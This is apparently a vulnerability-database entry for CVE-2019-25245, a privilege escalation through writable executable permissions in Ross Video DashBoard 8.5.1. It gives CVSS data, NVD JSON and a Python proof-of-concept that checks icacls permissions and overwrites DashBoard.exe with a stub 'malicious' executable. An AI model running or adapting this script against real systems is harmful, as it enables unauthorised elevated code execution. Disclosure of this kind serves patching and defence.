Security Vulnerability Report
中文
CVE-2019-25245 CVSS 8.8 HIGH

CVE-2019-25245

Published: 2025-12-24 20:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Ross Video DashBoard 8.5.1 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files due to improper permission settings. Attackers can exploit the 'M' or 'C' flags for 'Authenticated Users' group to replace the DashBoard.exe binary with a malicious executable.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ross Video DashBoard 8.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2019-25245 PoC - Ross Video DashBoard 8.5.1 Privilege Escalation # This PoC demonstrates the permission misconfiguration vulnerability # Requirements: Authenticated user access to the target system import os import shutil import sys TARGET_EXECUTABLE = "DashBoard.exe" MALICIOUS_EXECUTABLE = "malicious_dashboard.exe" BACKUP_SUFFIX = ".backup" def check_permissions(target_path): """ Check if the current user has write permissions on DashBoard.exe This simulates checking for M or C flags on Authenticated Users """ try: # On Windows, use icacls to check permissions import subprocess result = subprocess.run( ['icacls', target_path], capture_output=True, text=True ) # Check if Authenticated Users have modify/write permissions if 'Authenticated Users' in result.stdout: if 'M' in result.stdout or 'W' in result.stdout: print(f"[+] Vulnerable: Authenticated Users has modify permissions on {target_path}") return True return False except Exception as e: print(f"[-] Error checking permissions: {e}") return False def create_malicious_executable(output_path): """ Create a malicious executable that will run with elevated privileges This is a placeholder - actual malicious code would be placed here """ try: # Create a simple malicious executable # In real attack, this would be a reverse shell or other malicious code with open(output_path, 'wb') as f: # Simple PE header for a minimal executable pe_header = bytes([ 0x4D, 0x5A, # MZ signature 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ]) f.write(pe_header) print(f"[+] Created malicious executable: {output_path}") return True except Exception as e: print(f"[-] Error creating malicious executable: {e}") return False def exploit(target_path, backup_path): """ Perform the privilege escalation by replacing the legitimate executable """ try: # Step 1: Backup the original executable print(f"[*] Backing up original executable to {backup_path}") shutil.copy2(target_path, backup_path) # Step 2: Replace with malicious executable print(f"[*] Replacing {target_path} with malicious executable") shutil.copy2(MALICIOUS_EXECUTABLE, target_path) print("[+] Exploit completed successfully") print("[*] When DashBoard service restarts, the malicious code will execute with elevated privileges") return True except Exception as e: print(f"[-] Error during exploitation: {e}") return False def main(): # Default installation path - may vary default_paths = [ r"C:\Program Files\Ross Video\DashBoard\DashBoard.exe", r"C:\Program Files (x86)\Ross Video\DashBoard\DashBoard.exe" ] target_path = None for path in default_paths: if os.path.exists(path): target_path = path break if not target_path: print("[-] DashBoard.exe not found in default locations") target_path = input("Enter path to DashBoard.exe: ").strip() print(f"[*] Target: {target_path}") # Check if vulnerable if not check_permissions(target_path): print("[-] Target is NOT vulnerable to this exploit") return # Create malicious executable if not create_malicious_executable(MALICIOUS_EXECUTABLE): return # Perform exploitation backup_path = target_path + BACKUP_SUFFIX exploit(target_path, backup_path) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25245", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:52.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ross Video DashBoard 8.5.1 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files due to improper permission settings. Attackers can exploit the 'M' or 'C' flags for 'Authenticated Users' group to replace the DashBoard.exe binary with a malicious executable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46742", "source": "[email protected]"}, {"url": "https://www.rossvideo.com", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5516.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5516.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.